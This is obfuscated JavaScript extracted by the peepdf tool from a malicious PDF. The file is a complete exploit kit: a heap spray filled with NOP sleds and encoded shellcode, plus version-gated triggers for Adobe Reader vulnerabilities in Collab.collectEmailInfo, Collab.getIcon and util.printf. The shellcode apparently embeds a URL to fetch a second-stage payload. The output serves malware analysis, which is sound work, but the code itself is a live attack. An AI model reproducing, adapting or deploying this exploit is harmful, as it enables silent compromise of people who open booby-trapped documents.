// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%u', '4343%', 'u4343%u', '0FEB%u3', '35B%u6', '6C9%u8', '0B9%u80', '01%uEF33', '%uE243', '%uEBFA%', 'uE805%', 'uFFEC%uF', 'FFF%u8', 'B7F%uD', 'F4E%u', 'EFEF%u6', '4EF%uE', '3AF%u9F', '64%u4', '2F3%u9', 'F64%u6E', 'E7%uEF03', '%uEFEB%u', '64EF%u', 'B903%u6', '187%u', 'E1A1%', 'u0703%u', 'EF11%', 'uEFEF', '%uAA66%u', 'B9EB%', 'u7787%u6', '511%u', '07E1%', 'uEF1F%', 'uEFEF%u', 'AA66%uB9', 'E7%uCA', '87%u105F', '%u072D%', 'uEF0D%u', 'EFEF%u', 'AA66%', 'uB9E3', '%u0087%u', '0F21%u07', '8F%uEF3B', '%uEFEF%', 'uAA66%uB', '9FF%u2', 'E87%u', '0A96%', 'u0757', '%uEF29%u', 'EFEF%uA', 'A66%uAF', 'FB%uD76', 'F%u9A2', 'C%u6615', '%uF7AA', '%uE80', '6%uEFEE%', 'uB1EF', '%u9A6', '6%u64C', 'B%uEBA', 'A%uEE85%', 'u64B6%uF', '7BA%u', '07B9%', 'uEF64', '%uEFE', 'F%u87B', 'F%uF5', 'D9%u9FC0', '%u7807%u', 'EFEF%u', '66EF%uF', '3AA%u2A', '64%u2F', '6C%u66', 'BF%uCFAA', '%u1087', '%uEFE', 'F%uBFEF', '%uAA64', '%u85FB%u', 'B6ED%uB', 'A64%u0', '7F7%u', 'EF8E%uEF', 'EF%uAAEC', '%u28CF%u', 'B3EF%uC', '191%u288', 'A%uEBAF', '%u8A97%u', 'EFEF%u9A', '10%u64', 'CF%uE', '3AA%uEE8', '5%u64', 'B6%uF', '7BA%u', 'AF07%uE', 'FEF%u', '85EF%uB7', 'E8%uAAEC', '%uDCC', 'B%uBC34', '%u10BC%u', 'CF9A%uB', 'CBF%uA', 'A64%u8', '5F3%uB6E', 'A%uBA64%', 'u07F7', '%uEFCC%', 'uEFEF%', 'uEF85%u9', 'A10%u64', 'CF%uE7', 'AA%uED', '85%u6', '4B6%u', 'F7BA%uFF', '07%uEF', 'EF%u85EF', '%u6410%', 'uFFAA%', 'uEE85%u', '64B6%u', 'F7BA%u', 'EF07%uEF', 'EF%uA', 'EEF%uBDB', '4%u0EEC%', 'u0EEC%u0', 'EEC%u', '0EEC%u', '036C%uB5', 'EB%u64BC', '%u0D35', '%uBD18%', 'u0F10', '%u64BA%', 'u6403%u', 'E792%u', 'B264%uB9', 'E3%u9C6', '4%u64', 'D3%uF19B', '%uEC97%u', 'B91C%u99', '64%uECCF', '%uDC1', 'C%uA6', '26%u42AE', '%u2CE', 'C%uDCB9', '%uE01', '9%uFF5', '1%u1D', 'D5%uE79B', '%u212E', '%uECE2', '%uAF1', 'D%u1E0', '4%u11D4', '%u9AB', '1%uB5', '0A%u0', '464%uB5', '64%uEC', 'CB%u8', '932%uE3', '64%u64', 'A4%uF3B5', '%u32EC', '%uEB64', '%uEC64%u', 'B12A%u2', 'DB2%uEFE', '7%u1B', '07%u1', '011%uBA', '10%uA', '3BD%u', 'A0A2%u', 'EFA1%u7', '468%u7', '074%u2', 'F3A%u', '772F%u7', '26F%u646', 'C%u6977', '%u6564%', 'u752D', '%u6173%', 'u632E%u6', 'D6F%u772', 'F%u6265', '%u6C61', '%u7A69%u', '7265%', 'u6C2F%u6', 'E61%u696', '4%u676', 'E%u652', 'F%u65', '78%u702E', '%u7068%u', '783F%', 'u703D', '%u6664', '');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

